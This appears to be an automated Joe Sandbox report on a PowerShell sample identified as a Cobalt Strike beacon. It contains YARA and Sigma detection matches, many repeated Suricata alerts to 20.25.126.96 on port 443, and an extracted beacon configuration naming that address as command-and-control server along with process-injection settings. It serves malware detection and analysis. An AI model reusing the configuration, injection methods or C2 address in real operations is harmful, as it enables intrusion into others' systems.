0.2.powershell.exe.1a6ed2e0000.0.unpack	Windows_Trojan_CobaltStrike_663fc95d	Identifies CobaltStrike via unidentified function code	unknown	0x1c13c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
0.2.powershell.exe.1a6ed2e0000.0.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x17d6a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75 0x1909b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
0.2.powershell.exe.1a6ed2e0000.0.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3e7f1:$loader_export: ReflectiveLoader 0x30360:$exportname: beacon.dll
0.2.powershell.exe.1a6ed2e0000.0.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x303a3:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
Click to see the 40 entries

Other

Source	Rule	Description	Author	Strings
amsi64_2820.amsi.csv	JoeSecurity_MetasploitPayload_1	Yara detected MetasploitPayload	Joe Security
amsi64_2820.amsi.csv	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0xd4:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x5f5:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x6e8:$s5: = [System.Convert]::FromBase64String( 0x345:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x53d:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", ProcessId: 2820, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\oEFrY6Xcyl.ps1", ProcessId: 2820, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T13:43:35.032958+0200	2028765	3	Unknown Traffic	192.168.2.6	49710	20.25.126.96	443	TCP
2024-10-26T13:43:37.982753+0200	2028765	3	Unknown Traffic	192.168.2.6	49714	20.25.126.96	443	TCP
2024-10-26T13:43:40.677125+0200	2028765	3	Unknown Traffic	192.168.2.6	49728	20.25.126.96	443	TCP
2024-10-26T13:43:43.356490+0200	2028765	3	Unknown Traffic	192.168.2.6	49750	20.25.126.96	443	TCP
2024-10-26T13:43:46.008163+0200	2028765	3	Unknown Traffic	192.168.2.6	49764	20.25.126.96	443	TCP
2024-10-26T13:43:48.722575+0200	2028765	3	Unknown Traffic	192.168.2.6	49783	20.25.126.96	443	TCP
2024-10-26T13:43:51.454786+0200	2028765	3	Unknown Traffic	192.168.2.6	49793	20.25.126.96	443	TCP
2024-10-26T13:43:54.168915+0200	2028765	3	Unknown Traffic	192.168.2.6	49801	20.25.126.96	443	TCP
2024-10-26T13:43:56.852102+0200	2028765	3	Unknown Traffic	192.168.2.6	49808	20.25.126.96	443	TCP
2024-10-26T13:43:59.563189+0200	2028765	3	Unknown Traffic	192.168.2.6	49814	20.25.126.96	443	TCP
2024-10-26T13:44:02.219634+0200	2028765	3	Unknown Traffic	192.168.2.6	49820	20.25.126.96	443	TCP
2024-10-26T13:44:04.941642+0200	2028765	3	Unknown Traffic	192.168.2.6	49826	20.25.126.96	443	TCP
2024-10-26T13:44:07.688886+0200	2028765	3	Unknown Traffic	192.168.2.6	49832	20.25.126.96	443	TCP
2024-10-26T13:44:10.361019+0200	2028765	3	Unknown Traffic	192.168.2.6	49847	20.25.126.96	443	TCP
2024-10-26T13:44:13.061690+0200	2028765	3	Unknown Traffic	192.168.2.6	49862	20.25.126.96	443	TCP
2024-10-26T13:44:15.778625+0200	2028765	3	Unknown Traffic	192.168.2.6	49877	20.25.126.96	443	TCP
2024-10-26T13:44:18.484894+0200	2028765	3	Unknown Traffic	192.168.2.6	49897	20.25.126.96	443	TCP
2024-10-26T13:44:21.179909+0200	2028765	3	Unknown Traffic	192.168.2.6	49915	20.25.126.96	443	TCP
2024-10-26T13:44:23.895011+0200	2028765	3	Unknown Traffic	192.168.2.6	49933	20.25.126.96	443	TCP
2024-10-26T13:44:26.612940+0200	2028765	3	Unknown Traffic	192.168.2.6	49950	20.25.126.96	443	TCP
2024-10-26T13:44:29.318794+0200	2028765	3	Unknown Traffic	192.168.2.6	49965	20.25.126.96	443	TCP
2024-10-26T13:44:32.042278+0200	2028765	3	Unknown Traffic	192.168.2.6	49980	20.25.126.96	443	TCP
2024-10-26T13:44:34.763942+0200	2028765	3	Unknown Traffic	192.168.2.6	49995	20.25.126.96	443	TCP
2024-10-26T13:44:37.488476+0200	2028765	3	Unknown Traffic	192.168.2.6	50010	20.25.126.96	443	TCP
2024-10-26T13:44:40.165251+0200	2028765	3	Unknown Traffic	192.168.2.6	50026	20.25.126.96	443	TCP
2024-10-26T13:44:42.835987+0200	2028765	3	Unknown Traffic	192.168.2.6	50045	20.25.126.96	443	TCP
2024-10-26T13:44:45.642472+0200	2028765	3	Unknown Traffic	192.168.2.6	50062	20.25.126.96	443	TCP
2024-10-26T13:44:48.416246+0200	2028765	3	Unknown Traffic	192.168.2.6	50065	20.25.126.96	443	TCP
2024-10-26T13:44:51.344997+0200	2028765	3	Unknown Traffic	192.168.2.6	50068	20.25.126.96	443	TCP
2024-10-26T13:44:54.060795+0200	2028765	3	Unknown Traffic	192.168.2.6	50071	20.25.126.96	443	TCP
2024-10-26T13:44:56.709003+0200	2028765	3	Unknown Traffic	192.168.2.6	50074	20.25.126.96	443	TCP
2024-10-26T13:44:59.449017+0200	2028765	3	Unknown Traffic	192.168.2.6	50077	20.25.126.96	443	TCP
2024-10-26T13:45:02.174901+0200	2028765	3	Unknown Traffic	192.168.2.6	50080	20.25.126.96	443	TCP
2024-10-26T13:45:04.888705+0200	2028765	3	Unknown Traffic	192.168.2.6	50083	20.25.126.96	443	TCP
2024-10-26T13:45:07.603556+0200	2028765	3	Unknown Traffic	192.168.2.6	50086	20.25.126.96	443	TCP
2024-10-26T13:45:10.283030+0200	2028765	3	Unknown Traffic	192.168.2.6	50089	20.25.126.96	443	TCP
2024-10-26T13:45:12.989545+0200	2028765	3	Unknown Traffic	192.168.2.6	50093	20.25.126.96	443	TCP
2024-10-26T13:45:15.686450+0200	2028765	3	Unknown Traffic	192.168.2.6	50096	20.25.126.96	443	TCP
2024-10-26T13:45:18.378697+0200	2028765	3	Unknown Traffic	192.168.2.6	50099	20.25.126.96	443	TCP
2024-10-26T13:45:22.589406+0200	2028765	3	Unknown Traffic	192.168.2.6	50102	20.25.126.96	443	TCP
2024-10-26T13:45:25.255307+0200	2028765	3	Unknown Traffic	192.168.2.6	50105	20.25.126.96	443	TCP
2024-10-26T13:45:27.954262+0200	2028765	3	Unknown Traffic	192.168.2.6	50108	20.25.126.96	443	TCP
2024-10-26T13:45:30.654752+0200	2028765	3	Unknown Traffic	192.168.2.6	50111	20.25.126.96	443	TCP
2024-10-26T13:45:33.419957+0200	2028765	3	Unknown Traffic	192.168.2.6	50114	20.25.126.96	443	TCP
2024-10-26T13:45:36.097457+0200	2028765	3	Unknown Traffic	192.168.2.6	50117	20.25.126.96	443	TCP
2024-10-26T13:45:38.808343+0200	2028765	3	Unknown Traffic	192.168.2.6	50120	20.25.126.96	443	TCP
2024-10-26T13:45:41.657149+0200	2028765	3	Unknown Traffic	192.168.2.6	50123	20.25.126.96	443	TCP
2024-10-26T13:45:44.352878+0200	2028765	3	Unknown Traffic	192.168.2.6	50126	20.25.126.96	443	TCP
2024-10-26T13:45:47.115614+0200	2028765	3	Unknown Traffic	192.168.2.6	50130	20.25.126.96	443	TCP
2024-10-26T13:45:49.806539+0200	2028765	3	Unknown Traffic	192.168.2.6	50133	20.25.126.96	443	TCP
2024-10-26T13:45:52.519389+0200	2028765	3	Unknown Traffic	192.168.2.6	50136	20.25.126.96	443	TCP
2024-10-26T13:45:55.290464+0200	2028765	3	Unknown Traffic	192.168.2.6	50139	20.25.126.96	443	TCP
2024-10-26T13:45:57.979184+0200	2028765	3	Unknown Traffic	192.168.2.6	50142	20.25.126.96	443	TCP
2024-10-26T13:46:00.683469+0200	2028765	3	Unknown Traffic	192.168.2.6	50145	20.25.126.96	443	TCP
2024-10-26T13:46:03.393152+0200	2028765	3	Unknown Traffic	192.168.2.6	50148	20.25.126.96	443	TCP
2024-10-26T13:46:06.059822+0200	2028765	3	Unknown Traffic	192.168.2.6	50151	20.25.126.96	443	TCP
2024-10-26T13:46:08.751972+0200	2028765	3	Unknown Traffic	192.168.2.6	50154	20.25.126.96	443	TCP
2024-10-26T13:46:11.481153+0200	2028765	3	Unknown Traffic	192.168.2.6	50157	20.25.126.96	443	TCP
2024-10-26T13:46:14.188731+0200	2028765	3	Unknown Traffic	192.168.2.6	50160	20.25.126.96	443	TCP
2024-10-26T13:46:16.858261+0200	2028765	3	Unknown Traffic	192.168.2.6	50163	20.25.126.96	443	TCP
2024-10-26T13:46:20.646912+0200	2028765	3	Unknown Traffic	192.168.2.6	50166	20.25.126.96	443	TCP
2024-10-26T13:46:24.305152+0200	2028765	3	Unknown Traffic	192.168.2.6	50169	20.25.126.96	443	TCP
2024-10-26T13:46:26.981500+0200	2028765	3	Unknown Traffic	192.168.2.6	50172	20.25.126.96	443	TCP
2024-10-26T13:46:29.690918+0200	2028765	3	Unknown Traffic	192.168.2.6	50175	20.25.126.96	443	TCP
2024-10-26T13:46:32.386337+0200	2028765	3	Unknown Traffic	192.168.2.6	50178	20.25.126.96	443	TCP
2024-10-26T13:46:35.045259+0200	2028765	3	Unknown Traffic	192.168.2.6	50181	20.25.126.96	443	TCP
2024-10-26T13:46:37.861128+0200	2028765	3	Unknown Traffic	192.168.2.6	50184	20.25.126.96	443	TCP
2024-10-26T13:46:40.558417+0200	2028765	3	Unknown Traffic	192.168.2.6	50187	20.25.126.96	443	TCP
2024-10-26T13:46:43.273237+0200	2028765	3	Unknown Traffic	192.168.2.6	50190	20.25.126.96	443	TCP
2024-10-26T13:46:46.014854+0200	2028765	3	Unknown Traffic	192.168.2.6	50193	20.25.126.96	443	TCP
2024-10-26T13:46:48.736786+0200	2028765	3	Unknown Traffic	192.168.2.6	50196	20.25.126.96	443	TCP
2024-10-26T13:46:51.533636+0200	2028765	3	Unknown Traffic	192.168.2.6	50199	20.25.126.96	443	TCP
2024-10-26T13:46:54.273511+0200	2028765	3	Unknown Traffic	192.168.2.6	50202	20.25.126.96	443	TCP
2024-10-26T13:46:57.003778+0200	2028765	3	Unknown Traffic	192.168.2.6	50205	20.25.126.96	443	TCP
2024-10-26T13:46:59.748162+0200	2028765	3	Unknown Traffic	192.168.2.6	50208	20.25.126.96	443	TCP
2024-10-26T13:47:02.448936+0200	2028765	3	Unknown Traffic	192.168.2.6	50211	20.25.126.96	443	TCP
2024-10-26T13:47:05.148131+0200	2028765	3	Unknown Traffic	192.168.2.6	50214	20.25.126.96	443	TCP
2024-10-26T13:47:07.832941+0200	2028765	3	Unknown Traffic	192.168.2.6	50218	20.25.126.96	443	TCP
2024-10-26T13:47:10.544254+0200	2028765	3	Unknown Traffic	192.168.2.6	50221	20.25.126.96	443	TCP
2024-10-26T13:47:13.235791+0200	2028765	3	Unknown Traffic	192.168.2.6	50224	20.25.126.96	443	TCP
2024-10-26T13:47:15.894331+0200	2028765	3	Unknown Traffic	192.168.2.6	50227	20.25.126.96	443	TCP
2024-10-26T13:47:18.756780+0200	2028765	3	Unknown Traffic	192.168.2.6	50230	20.25.126.96	443	TCP
2024-10-26T13:47:21.430912+0200	2028765	3	Unknown Traffic	192.168.2.6	50233	20.25.126.96	443	TCP
2024-10-26T13:47:24.211500+0200	2028765	3	Unknown Traffic	192.168.2.6	50236	20.25.126.96	443	TCP
2024-10-26T13:47:26.900568+0200	2028765	3	Unknown Traffic	192.168.2.6	50239	20.25.126.96	443	TCP
2024-10-26T13:47:29.616847+0200	2028765	3	Unknown Traffic	192.168.2.6	50242	20.25.126.96	443	TCP
2024-10-26T13:47:32.345456+0200	2028765	3	Unknown Traffic	192.168.2.6	50245	20.25.126.96	443	TCP
2024-10-26T13:47:35.043396+0200	2028765	3	Unknown Traffic	192.168.2.6	50248	20.25.126.96	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: oEFrY6Xcyl.ps1

Avira: detected

Found malware configuration

Source: 00000000.00000002.4595950980.000001A6E4C51000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "20.25.126.96,/cm", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}

Multi AV Scanner detection for submitted file

Source: oEFrY6Xcyl.ps1

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.1% probability

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 0_2_000001A6ED331184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

0_2_000001A6ED331184

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED349220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,		0_2_000001A6ED349220
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_000001A6ED341C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,		0_2_000001A6ED341C30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 20.25.126.96

Source: Joe Sandbox View

IP Address: 20.25.126.96 20.25.126.96

Source: Joe Sandbox View

ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49710 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49793 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49714 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49750 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49808 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49728 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49832 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49820 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49764 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49814 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49826 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49847 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49783 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49801 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49862 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49877 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49897 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49915 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49933 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49950 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49980 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49965 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:49995 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50010 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50026 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50045 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50062 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50068 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50071 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50074 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50077 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50080 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50083 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50065 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50086 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50089 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50099 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50114 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50108 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50123 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50111 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50133 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50096 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50139 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50142 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50145 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50105 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50130 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50102 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50093 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50117 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50148 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50126 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50154 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50151 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50136 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50163 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50175 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50169 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50120 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50160 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50172 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50178 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50166 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50184 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50190 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50157 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50202 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50193 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50187 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50199 -> 20.25.126.96:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:50205 -> 20.25.126.96:443
